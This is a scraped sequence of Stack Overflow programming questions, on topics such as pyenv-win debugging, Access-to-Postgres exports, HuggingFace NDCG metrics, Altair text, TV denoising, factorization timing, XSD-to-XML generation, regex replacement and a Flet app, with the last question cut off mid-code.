<p>I gather that at some point I must've had <code>pyenv-win</code> installing Python interpreters in <code>%AppData%</code> or something, rather than in <code>~\.pyenv\pyenv-win\versions</code>. Or maybe not that, I'm kind of at a loss. For some reason, somewhere along the expansion of all the path aliases, <code>%AppData%\Roaming\</code> is being inserted into the effective interpreter path. This is specified nowhere in my <code>$PATH</code> or <code>$PYTHONPATH</code> or any of the interpreter settings in VS Code (that I've found).</p>
<p>Another quirky thing? I have no issues running the very same Python script in a PowerShell terminal, including the terminal integrated into VS Code. This leads me to believe the issue is some stray setting that is affecting the <code>debugpy</code> extension. However, the command entered into the terminal when starting debugging in VS Code (I just press <code>F5</code>) includes the explicit path to the Python interpreter in my virtual environment. Moreover, manually typing that path in the same terminal window/session just works and throws no errors, just like typing <code>python ...</code> does. Running</p>
<p><code>gcm python | Format-List *</code></p>
<p>in the activated virtual environment returns the correct path to the <code>pyenv-win</code> shims directory.</p>
<p>I don't recall if I installed any updates to the VS Code Python-related extensions, nor what changed on my system a few months ago that precipitated the errors. I have made no gross, global changes to any of my workflow, that I can recall: same computer, same install of Windows 10, same install of <code>pyenv-win</code> (I think). It <em>might</em> be that I used to have system Python installed in <code>%AppData%\Roaming\</code> but removed it, and there's something in the <code>pyenv-win</code> configuration/setup that needs to be updated. However, I've done some <code>ripgrep</code> searches in (at least some of) the relevant directories and not found anything obviously incriminating.</p>
<p>I appreciate any tips or help.</p>
<p>Cheerio!</p>
<p><strong>[EDIT TO ADD]</strong>: I just attempted to execute a script using the "Run Python File" command (under the play arrow) and there were no path errors. Trying to run with the debugger is where the error arises.</p>
|
<python><visual-studio-code><pyenv><pyenv-win>
|
2025-01-17 22:01:16
| 0
| 998
|
Daniel Black
|
79,366,085
| 1,245,659
|
How to specify a schema in a DoCmd.TransferDatabase command
|
<p>I am writing a Python script to copy MS Access tables to Postgres. In this particular case, I'm trying to specify the schema that the tables are loaded into in Postgres. Most code I found here on SO just loads into the default public schema; I need to load into specific schemas.</p>
<pre><code>a = win32com.client.Dispatch("Access.Application")
a.OpenCurrentDatabase(db_path)
table_list = []
for table_info in cursor.tables(tableType='TABLE'):
table_list.append(table_info.table_name)
print (table_list)
for table in table_list:
logging.info(f"Exporting: {table}")
acExport = 1
acTable = 0
a.DoCmd.TransferDatabase(
acExport,
"ODBC Database",
"ODBC;DSN=PostgreSQL30;"
f"DATABASE={db_name};"
f"UID={pg_user};"
f"PWD={pg_pwd};"
f"Schema=Commercial;",
acTable,
f"{table}",
f"{table.lower()}"
)
logging.info(f"Finished Export of Table: {table}")
logging.info("Creating empty table in EGDB based off of this")
</code></pre>
<p>My issue with this is that while I have tried <code>Schema=Commercial</code> and <code>f"Commercial.{table.lower()}"</code>, the tables always land in the public schema. How do I tell the command to export to the correct schema?</p>
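<p>In case the connection-string <code>Schema</code> option keeps being ignored, one blunt workaround is to let <code>TransferDatabase</code> export into <code>public</code> and then move each table with a plain SQL statement afterwards. This is only a sketch: it assumes <code>psycopg2</code> is available, that the <code>Commercial</code> schema already exists, and the connection parameters (host etc.) are made up:</p>
<pre class="lang-py prettyprint-override"><code>import psycopg2

# hypothetical post-export step: move the freshly exported table out of public
conn = psycopg2.connect(dbname=db_name, user=pg_user, password=pg_pwd, host="localhost")
with conn, conn.cursor() as cur:
    cur.execute(f'ALTER TABLE public."{table.lower()}" SET SCHEMA "Commercial";')
conn.close()
</code></pre>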
<p>Thanks</p>
|
<python><postgresql><ms-access>
|
2025-01-17 20:59:07
| 1
| 305
|
arcee123
|
79,366,038
| 5,923,374
|
HuggingFace: How to compute NDCG in compute metrics?
|
<p>Huggingface trainer has parameter <code>compute_metrics</code>. This function however receives only <code>predictions</code> and <code>labels</code> as its input:</p>
<pre><code>def compute_metric(pred_label):
pred, label = pred_label
return my_metric(pred, label)
</code></pre>
<p>This is sufficient for computing, say, <code>Accuracy</code>, but unsuitable for more complex metrics like <code>NDCG</code>, since NDCG also requires information about <code>group_id</code>.</p>
<p>The typical example is information retrieval, where you benchmark a set of queries (group_ids), each with a different ordering of preferred results.</p>
<p>Is there a way to access information about <code>group_ids</code> in <code>compute_metrics</code>?</p>
<p>Furthermore, is there a way to access eval dataset name inside <code>compute_metrics</code>?</p>
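<p>For the <code>group_id</code> part, one pattern that is sometimes used is to build <code>compute_metrics</code> as a closure over the group ids taken from the eval dataset. This is only a sketch: it assumes the eval dataset is not shuffled (so predictions come back in dataset order), assumes one relevance score per example, and the <code>group_id</code> column name is made up:</p>
<pre class="lang-py prettyprint-override"><code>import numpy as np
from sklearn.metrics import ndcg_score

def make_compute_metrics(group_ids):
    group_ids = np.asarray(group_ids)  # one id per eval example, in dataset order

    def compute_metrics(eval_pred):
        preds, labels = eval_pred
        preds = np.asarray(preds).squeeze()
        labels = np.asarray(labels).squeeze()
        scores = []
        for g in np.unique(group_ids):
            mask = group_ids == g
            if mask.sum() < 2:          # NDCG needs at least two documents per query
                continue
            scores.append(ndcg_score(labels[mask][None, :], preds[mask][None, :]))
        return {"ndcg": float(np.mean(scores))}

    return compute_metrics

# trainer = Trainer(..., compute_metrics=make_compute_metrics(eval_dataset["group_id"]))
</code></pre>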
|
<python><huggingface-transformers>
|
2025-01-17 20:33:39
| 0
| 1,538
|
Ford O.
|
79,366,003
| 11,295,602
|
Controlling build directories for python wheel building
|
<p>Is there a canonical way to ensure no build files (temporary or otherwise) are written to the project area when I build?</p>
<p>When I do a <code>python -m build --wheel</code> for example, I see a <code>build</code> and <code>dist</code> directory with various build artifacts.</p>
<p>I tackled this issue a while back: it involved writing custom bdist_wheel, egg_info, and build commands in setup.py (and then overriding their initialize_options), but when I try this method now my redirects are being ignored.</p>
<p>It seems like these days the build system is calling build_meta backend which is building in the project area without checking the options.</p>
<p>I know I can pass <code>--outdir</code> to the build command but my build process requires a directory to be generated on the fly so I can't use this unless I write a build script and bypass setup.py and build entirely.</p>
<p>What is the modern way to handle this?</p>
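<p>For completeness, one blunt workaround (not an answer to the backend question) is to drive <code>build</code> from a script that copies the source into a temporary directory and builds from there, so nothing is ever written to the real project area. Paths and ignore patterns below are assumptions:</p>
<pre class="lang-py prettyprint-override"><code>import shutil
import subprocess
import sys
import tempfile
from pathlib import Path

src = Path(".").resolve()
dist_dir = Path("/tmp/wheels")  # hypothetical output location outside the project

with tempfile.TemporaryDirectory() as tmp:
    work = Path(tmp) / "src"
    # copy the project, leaving VCS/venv and old artifacts behind
    shutil.copytree(src, work, ignore=shutil.ignore_patterns(".git", ".venv", "build", "dist"))
    subprocess.run(
        [sys.executable, "-m", "build", "--wheel", "--outdir", str(dist_dir), str(work)],
        check=True,
    )
</code></pre>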
|
<python><build><setuptools>
|
2025-01-17 20:09:25
| 0
| 303
|
squashed
|
79,365,967
| 2,864,250
|
Altair text on rule mark looks blurry
|
<p>For this <a href="https://altair-viz.github.io/gallery/bar_chart_with_single_threshold.html" rel="nofollow noreferrer">example</a> on the documentation page:</p>
<pre class="lang-py prettyprint-override"><code>import pandas as pd
import altair as alt
source = pd.DataFrame({
"Day": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],
"Value": [55, 112, 65, 38, 80, 138, 120, 103, 395, 200, 72, 51, 112, 175, 131]
})
threshold = 300
bars = alt.Chart(source).mark_bar(color="steelblue").encode(
x="Day:O",
y="Value:Q",
)
highlight = bars.mark_bar(color="#e45755").encode(
y2=alt.Y2(datum=threshold)
).transform_filter(
alt.datum.Value > threshold
)
rule = alt.Chart().mark_rule().encode(
y=alt.Y(datum=threshold)
)
label = rule.mark_text(
x="width",
dx=-2,
align="right",
baseline="bottom",
text="hazardous"
)
(bars + highlight + rule + label)
</code></pre>
<p>The text "hazardous" on the plot looks blurry. How can I control the font properties for a chart specified in this way?</p>
<p>I have tried adding <code>fontWeight="normal"</code> to the <code>mark_text</code> call but the result was unchanged. I would like the text to appear in the same font/weight as the axis labels.</p>
<p>see simplifed vega <a href="https://vega.github.io/editor/#/url/vega-lite/N4Igxg9gdgZglgcxALlANzgUwO4tJKAFzigFcJSBnAdTgBNCALFAZgAY2AacaYsiygAlMiRoVYcAvpO4AbAIYBPTACcUAbVABbeSoDWeEIUUAHTChArSs8zJCYokOiSSoQiw3XmFSWiW2kZbV0DN2MzC0JMAA9xbnlZRCgLFVE4kAAjeUpMRKhzZEyIQkIIP246aJQAWgAmbijYi0Z5AC9dOgEQbirC7HomEDsHJxdDDzcvHz9kdgDpAF0K73lDKHktApAp+WrMeQAWTAO6AE5TlnlT+RgWTABGeQB2e5gXy7YWAFYWe5YADi+Q24ABJKGBGJgdM0SiZKMgAPQItCYBDyAB0CDgTFIGXRcAgCPBkJ0yNRu0SUWRX3RtTY6Pu6IAVpRoN1tiscoRKJ4VntDsczhcrjc7o8Xm8-vJPj8-oCNKAACJKFD3bgANQSpAKXy+QRAyom9RAmtk2tV91q+sNrA1WoKADY9ZwlSrkAc7WaCgDrW6vp7zch-gEXQa3Q6AwU5b6Jk9I6q6TGUP948h7p8k8hTqmWKdna6JunU3SQwWLamnlbQza08bTYGvvdM39U-dLc2PSb7aqnvmw4X-V2varfpIFtIgA" rel="nofollow noreferrer">spec</a></p>
<p><a href="https://i.sstatic.net/tCGe9kKy.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/tCGe9kKy.png" alt="enter image description here" /></a></p>
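<p>For reference, the font-related knobs I would experiment with are the <code>mark_text</code> properties (<code>font</code>, <code>fontSize</code>, <code>fontWeight</code>) and the chart-level <code>configure_text</code> defaults; whether they actually cure the blurriness in the rendered image is a separate question. A sketch along those lines (the property values are just placeholders):</p>
<pre class="lang-py prettyprint-override"><code>label = rule.mark_text(
    x="width",
    dx=-2,
    align="right",
    baseline="bottom",
    text="hazardous",
    font="Helvetica",       # placeholder: match whatever font the axis labels use
    fontSize=11,
    fontWeight="normal",
)

chart = (bars + highlight + rule + label).configure_text(
    font="Helvetica",
    fontWeight="normal",
)
</code></pre>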
|
<python><altair>
|
2025-01-17 19:47:35
| 1
| 2,750
|
dubbbdan
|
79,365,903
| 3,368,667
|
access firestore database other than (default) in python
|
<p>I cannot access a Google Firestore database other than the one named "(default)". I looked at other solutions online and added a "databaseId" key to my initialization options, but that doesn't work. Here is my current script:</p>
<pre><code>def firestore_add_doc(data):
print('DEBUG Firestore document creation script triggered')
# Load credentials from dictionary
cred = credentials.Certificate(cred_dict)
# Firestore collection name (must exist)
FIRESTORE_COLLECTION = "firestore_collection_one"
try:
# Check if Firebase is already initialized
if not firebase_admin._apps:
firebase_admin.initialize_app(cred, {
'projectId': 'cheftest-f174c',
'databaseId': 'cheftestfirestore'
})
else:
print("Firebase already initialized.")
# Get Firestore client
db = firestore.client()
# Add document to Firestore
collection_ref = db.collection(FIRESTORE_COLLECTION)
doc_ref = collection_ref.add(data)
print(f"Document added with ID: {doc_ref[1].id}")
except Exception as e:
print(f"Error adding document to Firestore: {e}")
if __name__ == "__main__":
data = {
"key1test": "value1test",
"key2test": "value2test"
}
firestore_add_doc(data)
</code></pre>
<p>It still only puts data in the (default) database and, if that database doesn't exist, throws me an error. I checked through the Google CLI and the other database does exist.</p>
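<p>For what it's worth, here is a sketch of how a named (non-default) database is usually selected with the Google client library directly. It assumes a reasonably recent <code>google-cloud-firestore</code> where the client accepts a <code>database</code> argument (older releases only talk to <code>(default)</code>):</p>
<pre class="lang-py prettyprint-override"><code>from google.cloud import firestore
from google.oauth2 import service_account

creds = service_account.Credentials.from_service_account_info(cred_dict)

# explicitly target the named database instead of "(default)"
db = firestore.Client(
    project="cheftest-f174c",
    credentials=creds,
    database="cheftestfirestore",
)

db.collection("firestore_collection_one").add({"key1test": "value1test"})
</code></pre>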
|
<python><firebase><google-cloud-firestore><firebase-admin>
|
2025-01-17 19:21:32
| 1
| 1,077
|
tom
|
79,365,750
| 7,347,925
|
How to optimize the weight for TV filter?
|
<p>I have 2d data which has background noise and assembled high values. I'm trying to apply the TV filter to denoise the data. Is there a suitable method to avoid over-denoising the data?</p>
<p>I have tried to check the MSE value like this:</p>
<pre><code>import numpy as np
from skimage.restoration import denoise_tv_chambolle
import matplotlib.pyplot as plt
from sklearn.metrics import mean_squared_error
from scipy import stats
def create_mask_from_quantiles(image, lower_quantile=0.1, upper_quantile=0.9):
"""
Create a mask based on quantile values to exclude extreme values.
Parameters:
-----------
image : 2D numpy array
Input image
lower_quantile : float
Lower quantile threshold (0-1)
upper_quantile : float
Upper quantile threshold (0-1)
Returns:
--------
mask : 2D boolean array
True for values within quantile range
"""
lower_thresh = np.quantile(image, lower_quantile)
upper_thresh = np.quantile(image, upper_quantile)
return (image >= lower_thresh) & (image <= upper_thresh)
def tune_tv_chambolle(noisy_image, weight_range=None, n_weights=10,
lower_quantile=0.1, upper_quantile=0.9, multiplier=2, plot=True):
"""
Find suitable weight parameter for TV Chambolle denoising with quantile masking.
Parameters:
-----------
noisy_image : 2D numpy array
Input image with noise
weight_range : tuple, optional
Range of weights to test (min, max)
n_weights : int
Number of weights to test
lower_quantile : float
Lower quantile for masking
upper_quantile : float
Upper quantile for masking
multiplier: float
STD*multiplier for weight_max
plot : bool
Whether to plot the results
"""
# Create mask for background noise evaluation
mask = create_mask_from_quantiles(noisy_image, lower_quantile, upper_quantile)
if weight_range is None:
# Estimate initial range based on masked image statistics
masked_image = noisy_image[mask]
noise_std = np.std(masked_image)
weight_range = (noise_std/10, noise_std*multiplier)
print('weight_range: ', weight_range)
weights = np.linspace(weight_range[0], weight_range[1], n_weights)
denoised_images = []
metrics = {
'total_variation': [],
'mse_with_original': [],
'entropy': [],
'masked_mse': []
}
# Calculate baseline metrics
baseline_tv = np.sum(np.abs(np.diff(noisy_image, axis=0))) + \
np.sum(np.abs(np.diff(noisy_image, axis=1)))
# Test different weights
for weight in weights:
denoised = denoise_tv_chambolle(noisy_image, weight=weight,
channel_axis=None)
denoised_images.append(denoised)
# Calculate metrics for masked region
tv = np.sum(np.abs(np.diff(denoised, axis=0))) + \
np.sum(np.abs(np.diff(denoised, axis=1)))
metrics['total_variation'].append(tv)
metrics['mse_with_original'].append(
mean_squared_error(noisy_image, denoised))
metrics['masked_mse'].append(
mean_squared_error(noisy_image[mask], denoised[mask]))
metrics['entropy'].append(stats.entropy(denoised[mask].flatten()))
# Find optimal weight using the elbow method on masked MSE
mse_differences = np.diff(metrics['masked_mse'])
elbow_idx = np.argmax(np.abs(np.diff(mse_differences))) + 1
optimal_weight = weights[elbow_idx]
if plot:
fig, axes = plt.subplots(2, 3, figsize=(18, 12))
# Original image
im0 = axes[0,0].imshow(noisy_image, cmap='viridis')
axes[0,0].set_title('Original Noisy Image')
plt.colorbar(im0, ax=axes[0,0])
# Mask visualization
im1 = axes[0,1].imshow(mask, cmap='gray_r')
axes[0,1].set_title('Quantile Mask')
plt.colorbar(im1, ax=axes[0,1])
# Denoised image
optimal_denoised = denoised_images[elbow_idx]
im2 = axes[0,2].imshow(optimal_denoised, cmap='viridis')
axes[0,2].set_title(f'Denoised (weight={optimal_weight:.4f})')
plt.colorbar(im2, ax=axes[0,2])
# Metrics plots
axes[1,0].plot(weights, metrics['total_variation'], 'b-',
label='Total Variation')
axes[1,0].axvline(x=optimal_weight, color='r', linestyle='--',
label='Optimal Weight')
axes[1,0].set_xlabel('Weight')
axes[1,0].set_ylabel('Total Variation')
axes[1,0].legend()
axes[1,1].plot(weights, metrics['masked_mse'], 'g-',
label='Masked MSE')
axes[1,1].set_xlabel('Weight')
axes[1,1].set_ylabel('MSE (masked region)')
axes[1,1].legend()
axes[1,2].plot(weights, metrics['entropy'], 'm-',
label='Entropy (masked region)')
axes[1,2].set_xlabel('Weight')
axes[1,2].set_ylabel('Entropy')
axes[1,2].legend()
plt.suptitle(f'multiplier={multiplier}')
plt.tight_layout()
plt.show()
return optimal_weight, {
'weights': weights,
'metrics': metrics,
'denoised_images': denoised_images,
'mask': mask
}
def generate_test_data(size=100, noise_level=0.1, wind_direction=45, wind_speed=1.0):
"""
Generate synthetic test data with a realistic gas plume
Parameters:
-----------
size : int
Size of the output image (size x size)
noise_level : float
Standard deviation of the background noise
wind_direction : float
Wind direction in degrees (0 is East, 90 is North)
wind_speed : float
Relative wind speed affecting plume spread
Returns:
--------
test_image : 2D numpy array
Normalized image containing background noise and plume
"""
# Create background noise
background = np.random.normal(0, noise_level, (size, size))
# Create coordinate grid
x, y = np.meshgrid(np.linspace(-2, 2, size), np.linspace(-2, 2, size))
# Convert wind direction to radians and calculate rotated coordinates
theta = np.radians(wind_direction)
x_rot = x * np.cos(theta) + y * np.sin(theta)
y_rot = -x * np.sin(theta) + y * np.cos(theta)
# Create elongated plume shape
# Higher wind_speed creates more elongated plume
sigma_x = 0.8 * wind_speed # Spread in wind direction
sigma_y = 0.2 # Spread perpendicular to wind direction
# Add turbulent diffusion effect
turbulence = np.random.normal(0, 0.1, (size, size))
# Calculate plume concentration with gaussian dispersion model
plume = np.exp(-(x_rot**2/(2*sigma_x**2) + y_rot**2/(2*sigma_y**2)))
# Add some random variations to make it more realistic
plume = plume * (1 + 0.2 * turbulence)
# Add source point with higher concentration
source_x = size // 4
source_y = size // 2
plume[source_y-2:source_y+2, source_x-2:source_x+2] = 1.0
# Combine background and plume
test_image = background + plume
# Add some patchiness to the plume
patchiness = np.random.normal(0, 0.05, (size, size))
test_image = test_image * (1 + patchiness * (plume > 0.1))
# Normalize to 0-1 range
test_image = (test_image - test_image.min()) / (test_image.max() - test_image.min())
return test_image
# Generate test data with different wind conditions
test_image = generate_test_data(
size=100,
noise_level=0.1,
wind_direction=45, # 45 degree wind direction
wind_speed=1.5 # Moderate wind speed
)
multiplier = 2
# Find optimal weight and denoise
optimal_weight, results = tune_tv_chambolle(
test_image,
lower_quantile=0.2,
upper_quantile=0.8,
n_weights=15,
multiplier=multiplier,
)
# Apply final denoising with optimal weight
final_denoised = denoise_tv_chambolle(test_image, weight=optimal_weight,
channel_axis=None,
)
# Compare original vs denoised for masked region
mask = results['mask']
original_std = np.std(test_image[mask])
denoised_std = np.std(final_denoised[mask])
noise_reduction = (1 - denoised_std/original_std) * 100
print(f"Optimal weight: {optimal_weight:.4f}")
print(f"Noise reduction in masked region: {noise_reduction:.1f}%")
</code></pre>
<p>Here're some results using different weight_max of TV filter</p>
<h3>weight_max = noise_std*2</h3>
<p>Optimal weight: 0.0572
Noise reduction in masked region: 20.8%</p>
<p><a href="https://i.sstatic.net/jthB067F.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/jthB067F.png" alt="multiple2" /></a></p>
<h3>weight_max = noise_std*3</h3>
<p>Optimal weight: 0.0259
Noise reduction in masked region: 24.9%</p>
<p><a href="https://i.sstatic.net/z8eM2E5n.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/z8eM2E5n.png" alt="std3" /></a></p>
<h3>weight_max = noise_std*4</h3>
<p>Optimal weight: 0.0436
Noise reduction in masked region: 25.2%</p>
<p><a href="https://i.sstatic.net/oJ2BCjNA.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/oJ2BCjNA.png" alt="std4" /></a></p>
<h3>Question</h3>
<p>It seems <code>noise_std*3</code> picks the wrong optimal weight, judging from the image. How do I set a correct weight range so that the TV filter is optimized properly?</p>
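<p>As a side note, one way to anchor the weight range is to estimate the noise level with <code>skimage.restoration.estimate_sigma</code> instead of the masked standard deviation, and then scan weights around that estimate. This is only a sketch of the idea, not a guarantee that the elbow criterion will then pick the "right" weight:</p>
<pre class="lang-py prettyprint-override"><code>import numpy as np
from skimage.restoration import estimate_sigma

sigma_est = estimate_sigma(test_image, channel_axis=None)    # wavelet-based noise estimate
weights = np.linspace(0.5 * sigma_est, 3.0 * sigma_est, 15)  # scan around the estimate
print("estimated sigma:", sigma_est)
</code></pre>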
|
<python><numpy><image-processing><scikit-image><smoothing>
|
2025-01-17 18:15:43
| 1
| 1,039
|
zxdawn
|
79,365,706
| 16,383,578
|
Why factorization of products of close primes is much slower than products of dissimilar primes
|
<p>This is a purely academic question without any practical consideration. This is not homework, I dropped out of high school long ago. I am just curious, and I can't sleep well without knowing why.</p>
<p>I was messing around with Python. I decided to factorize big integers and measure the runtime of calls for each input.</p>
<p>I used a bunch of numbers and found that some numbers take much longer to factorize than others.</p>
<p>I then decided to investigate further. I quickly wrote a prime sieve function to generate primes for testing, and found that a product of two moderately large primes (two four-digit primes) takes much longer to factorize than a product of one very large prime (six digits or more) and a small prime (three digits or fewer).</p>
<p>At first I thought my first, simple test function was just inefficient (which is indeed the case), so I wrote a second function that pulls primes directly from a pre-generated list of primes. The second function is indeed more efficient, but strangely it exhibits the same pattern.</p>
<p>Here are some numbers that I used:</p>
<pre><code>13717421 == 3607 * 3803
13189903 == 3593 * 3671
56267023 == 7187 * 7829
65415743 == 8087 * 8089
12345679 == 37 * 333667
38760793 == 37 * 1047589
158202851 == 151 * 1047701
762312571 == 727 * 1048573
</code></pre>
<p>Code:</p>
<pre><code>import numpy as np
from itertools import cycle
def factorize(n):
factors = []
while not n % 2:
factors.append(2)
n //= 2
i = 3
while i**2 <= n:
while not n % i:
factors.append(i)
n //= i
i += 2
return factors if n == 1 else factors + [n]
TRIPLE = ((4, 2), (9, 6), (25, 10))
WHEEL = ( 4, 2, 4, 2, 4, 6, 2, 6 )
def prime_sieve(n):
primes = np.ones(n + 1, dtype=bool)
primes[:2] = False
for square, double in TRIPLE:
primes[square::double] = False
wheel = cycle(WHEEL)
k = 7
while (square := k**2) <= n:
if primes[k]:
primes[square::2*k] = False
k += next(wheel)
return np.flatnonzero(primes)
PRIMES = list(map(int, prime_sieve(1048576)))
TEST_LIMIT = PRIMES[-1] ** 2
def factorize_sieve(n):
if n > TEST_LIMIT:
raise ValueError('Number too large')
factors = []
for p in PRIMES:
if p**2 > n:
break
while not n % p:
factors.append(p)
n //= p
return factors if n == 1 else factors + [n]
</code></pre>
<p>Test result:</p>
<pre><code>In [2]: %timeit factorize(13717421)
279 μs ± 4.29 μs per loop (mean ± std. dev. of 7 runs, 1,000 loops each)
In [3]: %timeit factorize(12345679)
39.6 μs ± 749 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
In [4]: %timeit factorize_sieve(13717421)
64.1 μs ± 688 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
In [5]: %timeit factorize_sieve(12345679)
12.6 μs ± 146 ns per loop (mean ± std. dev. of 7 runs, 100,000 loops each)
In [6]: %timeit factorize_sieve(13189903)
64.6 μs ± 964 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
In [7]: %timeit factorize_sieve(56267023)
117 μs ± 3.88 μs per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
In [8]: %timeit factorize_sieve(65415743)
130 μs ± 1.38 μs per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
In [9]: %timeit factorize_sieve(38760793)
21.1 μs ± 232 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
In [10]: %timeit factorize_sieve(158202851)
21.4 μs ± 385 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
In [11]: %timeit factorize_sieve(762312571)
22.1 μs ± 409 ns per loop (mean ± std. dev. of 7 runs, 10,000 loops each)
</code></pre>
<p>As you can clearly see, factorization of two medium primes on average takes much longer than two extremes. Why is it this case?</p>
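<p>To make the comparison concrete, here is a small variant of the same trial-division loop that only counts how many candidate divisors it tries. For <code>13717421 = 3607 * 3803</code> the loop has to walk all odd numbers up to 3607 (roughly 1800 candidates), while for <code>12345679 = 37 * 333667</code> it stops at 37 and afterwards only has to go up to sqrt(333667) ≈ 578 (roughly 290 candidates in total):</p>
<pre class="lang-py prettyprint-override"><code>def trial_division_steps(n):
    steps = 0
    while n % 2 == 0:
        n //= 2
    i = 3
    while i * i <= n:
        steps += 1
        while n % i == 0:
            n //= i
        i += 2
    return steps

print(trial_division_steps(13717421))  # ~1800 iterations
print(trial_division_steps(12345679))  # ~290 iterations
</code></pre>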
|
<python><algorithm>
|
2025-01-17 17:58:27
| 2
| 3,930
|
Ξένη Γήινος
|
79,365,583
| 7,334,203
|
Python library that takes as input a complex XSD and outputs an XML
|
<p>I know my question is not crystal clear, but I'd like to find a robust and reliable Python library that takes as input a complex XML Schema Definition (XSD) file and produces an XML file. For example, I have this XSD:</p>
<pre><code> <xsd:schema xmlns:stf="urn" xmlns:xsd="http://www.w3.org/2001/XMLSchema" targetNamespace="urn" elementFormDefault="qualified" attributeFormDefault="unqualified" version="1.0">
<!-- Kind of Name -->
<xsd:simpleType name="NameType_EnumType">
<xsd:restriction base="xsd:string">
<xsd:enumeration value="OECD201"/>
<xsd:enumeration value="OECD202"/>
<xsd:enumeration value="OECD203"/>
<xsd:enumeration value="OECD204"/>
<xsd:enumeration value="OECD205"/>
<xsd:enumeration value="OECD206"/>
<xsd:enumeration value="OECD207"/>
<xsd:enumeration value="OECD208"/>
</xsd:restriction>
</xsd:simpleType>
<!-- -->
</xsd:schema>
</code></pre>
<p>How can I, with this XSD as input, produce an XML?
The data will be populated from a table; most likely, the data will come from Spark DataFrames.</p>
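<p>In case it helps to frame the search: the <code>xmlschema</code> package is one candidate that can load an XSD and encode Python dictionaries back into XML. The sketch below is only illustrative — the dictionary layout has to match the schema, and both the file name and the element layout here are made up:</p>
<pre class="lang-py prettyprint-override"><code>import xml.etree.ElementTree as ET
import xmlschema

schema = xmlschema.XMLSchema("my_schema.xsd")     # hypothetical schema file

# data would come from the (Spark) table, converted to plain Python structures first
data = {"SomeElement": {"NameType": "OECD201"}}   # made-up layout, must match the XSD

xml_element = schema.encode(data)                 # returns an ElementTree element
print(ET.tostring(xml_element, encoding="unicode"))
</code></pre>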
|
<python><xml><xsd>
|
2025-01-17 17:16:20
| 0
| 7,486
|
RamAlx
|
79,365,487
| 9,983,652
|
replace string in a text file with different replacement scenarios
|
<p>I have a text file and I need to replace the value after <code>*</code> under different scenarios. For example, in below data like <code>12*5 7*7 39*8</code>, I need to replace them to become <code>12*1000 7*2000 39*3000</code>. It means if the value after <code>*</code> is 5, it is replaced by 1000, if the value is 7, it is replaced by 2000, if the value is 8, it is replaced by 3000.</p>
<p>I wrote some code (below), but it doesn't work efficiently: I have to handle each replacement value separately, and there are some errors somewhere that I can't locate.</p>
<p>Any idea how to make it work?</p>
<pre><code>import re
file='input.txt'
file_write='output.txt'
def replace_string_cases_usename(item):
pattern_general=r"(?P<num>\d+)\*(?P<perm>\d+)"
result=re.findall(pattern_general,item)[0]
str_perm=result[1]
str_num=result[0]
# str_perm=result.group('perm')
print('found str perm is ',str_perm)
if str_perm=='5':
result_replaced=re.sub(pattern_general,'\g<num>*1000',item) # use \g<num> outside the pattern to refer to searching string
elif str_perm=='7':
result_replaced=re.sub(pattern_general,'\g<num>*2000',item)
elif str_perm=='8':
result_replaced=re.sub(pattern_general,'\g<num>*3000',item)
else:
result_replaced=re.sub(pattern_general,'\g<num>*4000',item)
print('original=',item)
print('fixed=',result_replaced)
return (result_replaced,str_num)
saved_list_all_lines=[]
with open(file,'r') as infile:
all_lines=infile.readlines()
i=0
x_item=0
x_item_single=0
for line in all_lines:
i+=1
# print('line=',i)
saved_list_this_line=[]
line1=line.strip() # strip both leading and tailing white space
item_list=line1.split(' ')
for item in item_list:
# print(item)
if '*' in item:
(result_replaced,str_num)=replace_string_cases_usename(item)
saved_list_this_line.append(result_replaced)
x_item+=int(float(str_num))
else:
print('single item is',item)
x_item_single+=1
result_replaced=replace_string_cases_singlenum(item)
saved_list_this_line.append(result_replaced)
x_item+=1
# saved_list_this_line.append(item) # testing without replace
# add line return at the end
saved_list_this_line.append('\n')
#join all the string into a big string to represent one line
str_thisline=' '.join(saved_list_this_line)
print('This line string are ',str_thisline)
#save this line big string into the other list
saved_list_all_lines.append(str_thisline)
print('Total num of items is ',x_item)
print('The num of single items is ',x_item_single)
print('Final String are ',saved_list_all_lines)
#now need to write saved data back to another file
with open(file_write,'w') as outfile:
for str_line in saved_list_all_lines:
outfile.write(str_line)
12*5 7*7 39*8 255 10*5 39*4 74*3 83*255 31*2 22*3 2*4 3 10*5 6*7 38*8 255 10*5 39*4 69*3 95*255 20*2 22*3 4 4*3 4 9*5 6*7 40*8 255 12*5 39*4 56*3 103*255 18*2 22*3 4 2*3 4 5 4 11*5 5*7 44*8 255 18*5 34*4 50*3 108*255 17*2 18*3 4 2*3 3*4 13*5 4*7 48*8 25*5 31*4 43*3 112*255 17*2 18*3 4*4 5 4 11*5 4*7 50*8 2*6 25*5 31*4 35*3 119*255 13*2 21*3 6*4 12*5 3*7 50*8 99*255 37*3 4 4*3 6*4 4*5 4 55*5 14*3 5 4*3 5 4*3 7 2*3 7 8 7 27*8 52*9 98*255 34*3 11*4 81*5
7*7 8 7 18*8 66*9 93*255 36*3 9*4 79*5 6 3*7 6 7*7 16*8 63*9 9*11
</code></pre>
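<p>For reference, the whole replacement can be expressed with a single <code>re.sub</code> and a mapping, using a function as the replacement argument. This is only a sketch of the idea (the fallback value 4000 mirrors the <code>else</code> branch above):</p>
<pre class="lang-py prettyprint-override"><code>import re

REPLACEMENTS = {"5": "1000", "7": "2000", "8": "3000"}
PATTERN = re.compile(r"(?P<num>\d+)\*(?P<perm>\d+)")

def replace_perm(match):
    num, perm = match.group("num"), match.group("perm")
    return f"{num}*{REPLACEMENTS.get(perm, '4000')}"

with open("input.txt") as infile, open("output.txt", "w") as outfile:
    for line in infile:
        outfile.write(PATTERN.sub(replace_perm, line))
</code></pre>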
|
<python>
|
2025-01-17 16:42:13
| 1
| 4,338
|
roudan
|
79,365,404
| 16,389,095
|
How to display two different views into main page
|
<p>I developed a simple app with two different views, each one defined in its own class. When I try to add the first one to the page, I get an error in the app window: <strong>"Unknown control view"</strong>. Here is the code:</p>
<pre><code>import flet as ft
import time
class WelcomeView(ft.View):
def __init__(self, window_width, window_height, login_on_click, route):
super().__init__()
self.window_width = window_width
